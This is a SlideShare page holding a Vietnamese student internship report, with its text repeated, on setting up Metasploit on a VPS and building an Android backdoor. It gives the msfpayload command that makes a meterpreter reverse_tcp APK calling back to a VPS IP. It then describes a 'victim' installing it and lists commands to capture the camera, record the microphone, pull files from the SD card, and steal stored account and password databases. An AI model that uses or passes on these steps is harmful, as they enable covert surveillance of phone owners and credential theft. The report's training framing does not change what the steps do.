SlideShare a Scribd company logo
1 of 11
Sinh viên thực tập : Trần Trọng An 
I. Thực hiện trên môi trường internet 
1.Cài mã độc trên VPS 
1.1 Cài đặt Metasploit lên VPS 
a. Giới thiệu 
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn 
công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng 
Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy 
trên hầu hết các hệ điều hành: Linux, Windows, MacOS. 
b. Cài đặt 
Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn 
phiên bản Community miễn phí và dùng cho nghiên cứu. 
Sau 
khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm khác. 
Chọn folder cài đặt:
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790: 
Chọn server và ngày hết hạn, để mặc định:
Quá trình cài đặt của Metasploit: 
Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
Sau khi Finish trình duyệt web mở lên và đi tới giao diện 
Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào 
Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create 
Account:
Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn 
phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License: 
2.Từ VPS điều khiển thiết bị qua internet 
Các bước thực hiện 
1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào
Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS 
Chúng ta vẫn sử dụng lệnh “Msfpayload 
android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > 
/root/Desktop/files.apk” ở đây địa chỉ VPS là 14.0.21.132 
2. Khởi động Metasploit Console trên VPS 
3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần 
trên, ở đây chỉ khác là sử dụng chính IP của VPS
4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị 
hack
Để xem thông tin về máy, nhập lệnh SysInfo
• Sử dụng camera: 
Để xem danh sách camera, nhập webcam_list 
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở 
danh sách camera ở phần trước. 
• Ghi âm 
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
• Lấy file từ sd card 
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục 
Dùng lệnh cd /sdcard/Download để vào thư mục 
Để tải về máy, ta nhập lệnh 
Download madoc.apk
Một số lệnh khác : 
để upload gõ lệnh upload 
Và file này sẽ được tải về thư mục root của máy Kali 
Gõ shell để vào lệnh 
kiểm tra xem có root chưa gõ 
su 
whoami 
Nếu báo unknown id is 0 tức là đã root 
ls -l danh mục file và các quyền 
cd để chuyển hướng thư mục 
Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền 
/DATA 
/DATA/APP 
/DATA/SYSTEM 
/DATA/SYSTEM/accounts.db 
/DATA/SYSTEM/SYNC/accounts.xml 
/SYSTEM/APP/ 
để xem danh sách và down load các file hay thay đổi các file trong ROM 
đầu tiên phải gõ lệnh SU để có toàn quyền truy cập 
để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename 
Ví dụ chmod -R 777 /data 
^C để quay lại 
Sử dụng SQLite để mở file db

More Related Content

What's hot

Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công androidAnh Hiếu
 
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...Nguyen Anh
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vpsHường Tô
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxLê Lãnh
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2Phuong Ngo
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6kakawpah0911
 

What's hot (20)

Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMware
 
Athena tuần 5
Athena tuần 5Athena tuần 5
Athena tuần 5
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
 
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vps
 
Bao cao tuan 6 7 8
Bao cao tuan 6 7 8Bao cao tuan 6 7 8
Bao cao tuan 6 7 8
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
 
Genmymotion
GenmymotionGenmymotion
Genmymotion
 
Metasploit
MetasploitMetasploit
Metasploit
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
 
Tuan5
Tuan5Tuan5
Tuan5
 
Kali linux
Kali linuxKali linux
Kali linux
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
Báo cáo tuần 5
Báo cáo tuần 5Báo cáo tuần 5
Báo cáo tuần 5
 
Tuan2
Tuan2Tuan2
Tuan2
 
tao ma doc tren kalilinux
tao ma doc tren kalilinuxtao ma doc tren kalilinux
tao ma doc tren kalilinux
 
Cai dat kali tren vmware
Cai dat kali tren vmwareCai dat kali tren vmware
Cai dat kali tren vmware
 
1
11
1
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
 

Viewers also liked

Báo cáo trần trong an
Báo cáo trần trong anBáo cáo trần trong an
Báo cáo trần trong anTrọng An
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt GenmymotionTrọng An
 
Dự án triển khai giải pháp VDI thành công - Mr Hoàng Văn Thắng
Dự án triển khai giải pháp VDI thành công - Mr Hoàng Văn ThắngDự án triển khai giải pháp VDI thành công - Mr Hoàng Văn Thắng
Dự án triển khai giải pháp VDI thành công - Mr Hoàng Văn ThắngLac Viet Computing Corporation
 
Kiến trúc mạng cho hệ thống VDI - Mr Nguyễn Phạm Vĩnh Khương
Kiến trúc mạng cho hệ thống VDI - Mr Nguyễn Phạm Vĩnh KhươngKiến trúc mạng cho hệ thống VDI - Mr Nguyễn Phạm Vĩnh Khương
Kiến trúc mạng cho hệ thống VDI - Mr Nguyễn Phạm Vĩnh KhươngLac Viet Computing Corporation
 
Vmware horizon6
Vmware horizon6Vmware horizon6
Vmware horizon6laonap166
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaCon Ranh
 
TÌM HIỂU VÀ TRIỂN KHAI VIRTUAL SAN TRONG VMWARE SERVER
TÌM HIỂU VÀ TRIỂN KHAI VIRTUAL SAN TRONG VMWARE SERVERTÌM HIỂU VÀ TRIỂN KHAI VIRTUAL SAN TRONG VMWARE SERVER
TÌM HIỂU VÀ TRIỂN KHAI VIRTUAL SAN TRONG VMWARE SERVERlaonap166
 
Công nghệ ảo hóa
Công nghệ ảo hóaCông nghệ ảo hóa
Công nghệ ảo hóaSrbIT
 

Viewers also liked (8)

Báo cáo trần trong an
Báo cáo trần trong anBáo cáo trần trong an
Báo cáo trần trong an
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt Genmymotion
 
Dự án triển khai giải pháp VDI thành công - Mr Hoàng Văn Thắng
Dự án triển khai giải pháp VDI thành công - Mr Hoàng Văn ThắngDự án triển khai giải pháp VDI thành công - Mr Hoàng Văn Thắng
Dự án triển khai giải pháp VDI thành công - Mr Hoàng Văn Thắng
 
Kiến trúc mạng cho hệ thống VDI - Mr Nguyễn Phạm Vĩnh Khương
Kiến trúc mạng cho hệ thống VDI - Mr Nguyễn Phạm Vĩnh KhươngKiến trúc mạng cho hệ thống VDI - Mr Nguyễn Phạm Vĩnh Khương
Kiến trúc mạng cho hệ thống VDI - Mr Nguyễn Phạm Vĩnh Khương
 
Vmware horizon6
Vmware horizon6Vmware horizon6
Vmware horizon6
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athena
 
TÌM HIỂU VÀ TRIỂN KHAI VIRTUAL SAN TRONG VMWARE SERVER
TÌM HIỂU VÀ TRIỂN KHAI VIRTUAL SAN TRONG VMWARE SERVERTÌM HIỂU VÀ TRIỂN KHAI VIRTUAL SAN TRONG VMWARE SERVER
TÌM HIỂU VÀ TRIỂN KHAI VIRTUAL SAN TRONG VMWARE SERVER
 
Công nghệ ảo hóa
Công nghệ ảo hóaCông nghệ ảo hóa
Công nghệ ảo hóa
 

Similar to Tạo mã độc trên vps để xâm nhập android ( môi trường internet )

Cai dat metasploit community tren windows và ubuntu
Cai dat metasploit community tren windows và ubuntuCai dat metasploit community tren windows và ubuntu
Cai dat metasploit community tren windows và ubuntuthach28
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5Nguyen Anh
 
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENABÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENAXuân Ngọc Nguyễn
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6phanconghien
 
Báo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-AthenaBáo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-Athenaquocluong
 
các bước hack server
các bước hack servercác bước hack server
các bước hack servertruong le hung
 
Cac buochackserver tech24_vn
Cac buochackserver tech24_vnCac buochackserver tech24_vn
Cac buochackserver tech24_vnhantinh169
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaÂu Dương Bình
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲkakawpah0911
 
File inclusion attack(nop thay)
File inclusion attack(nop thay)File inclusion attack(nop thay)
File inclusion attack(nop thay)phanleson
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲphanconghien
 

Similar to Tạo mã độc trên vps để xâm nhập android ( môi trường internet ) (19)

Tuan 4
Tuan 4Tuan 4
Tuan 4
 
Cai dat metasploit community tren windows và ubuntu
Cai dat metasploit community tren windows và ubuntuCai dat metasploit community tren windows và ubuntu
Cai dat metasploit community tren windows và ubuntu
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
 
Bai bao cao 4
Bai bao cao 4Bai bao cao 4
Bai bao cao 4
 
Vps
VpsVps
Vps
 
Tuan 3
Tuan 3Tuan 3
Tuan 3
 
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENABÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
 
Báo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-AthenaBáo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-Athena
 
các bước hack server
các bước hack servercác bước hack server
các bước hack server
 
Cac buochackserver
Cac buochackserverCac buochackserver
Cac buochackserver
 
Cac buochackserver tech24_vn
Cac buochackserver tech24_vnCac buochackserver tech24_vn
Cac buochackserver tech24_vn
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
File inclusion attack(nop thay)
File inclusion attack(nop thay)File inclusion attack(nop thay)
File inclusion attack(nop thay)
 
Bao cao
Bao caoBao cao
Bao cao
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
 
Wordpress
WordpressWordpress
Wordpress
 

Tạo mã độc trên vps để xâm nhập android ( môi trường internet )

  • 1. Sinh viên thực tập : Trần Trọng An I. Thực hiện trên môi trường internet 1.Cài mã độc trên VPS 1.1 Cài đặt Metasploit lên VPS a. Giới thiệu Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. b. Cài đặt Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn phiên bản Community miễn phí và dùng cho nghiên cứu. Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm khác. Chọn folder cài đặt:
  • 2. Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790: Chọn server và ngày hết hạn, để mặc định:
  • 3. Quá trình cài đặt của Metasploit: Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
  • 4. Sau khi Finish trình duyệt web mở lên và đi tới giao diện Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create Account:
  • 5. Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License: 2.Từ VPS điều khiển thiết bị qua internet Các bước thực hiện 1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào
  • 6. Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS Chúng ta vẫn sử dụng lệnh “Msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk” ở đây địa chỉ VPS là 14.0.21.132 2. Khởi động Metasploit Console trên VPS 3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử dụng chính IP của VPS
  • 7. 4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị hack
  • 8. Để xem thông tin về máy, nhập lệnh SysInfo
  • 9. • Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. • Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
  • 10. • Lấy file từ sd card Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục Dùng lệnh cd /sdcard/Download để vào thư mục Để tải về máy, ta nhập lệnh Download madoc.apk
  • 11. Một số lệnh khác : để upload gõ lệnh upload Và file này sẽ được tải về thư mục root của máy Kali Gõ shell để vào lệnh kiểm tra xem có root chưa gõ su whoami Nếu báo unknown id is 0 tức là đã root ls -l danh mục file và các quyền cd để chuyển hướng thư mục Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ để xem danh sách và down load các file hay thay đổi các file trong ROM đầu tiên phải gõ lệnh SU để có toàn quyền truy cập để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data ^C để quay lại Sử dụng SQLite để mở file db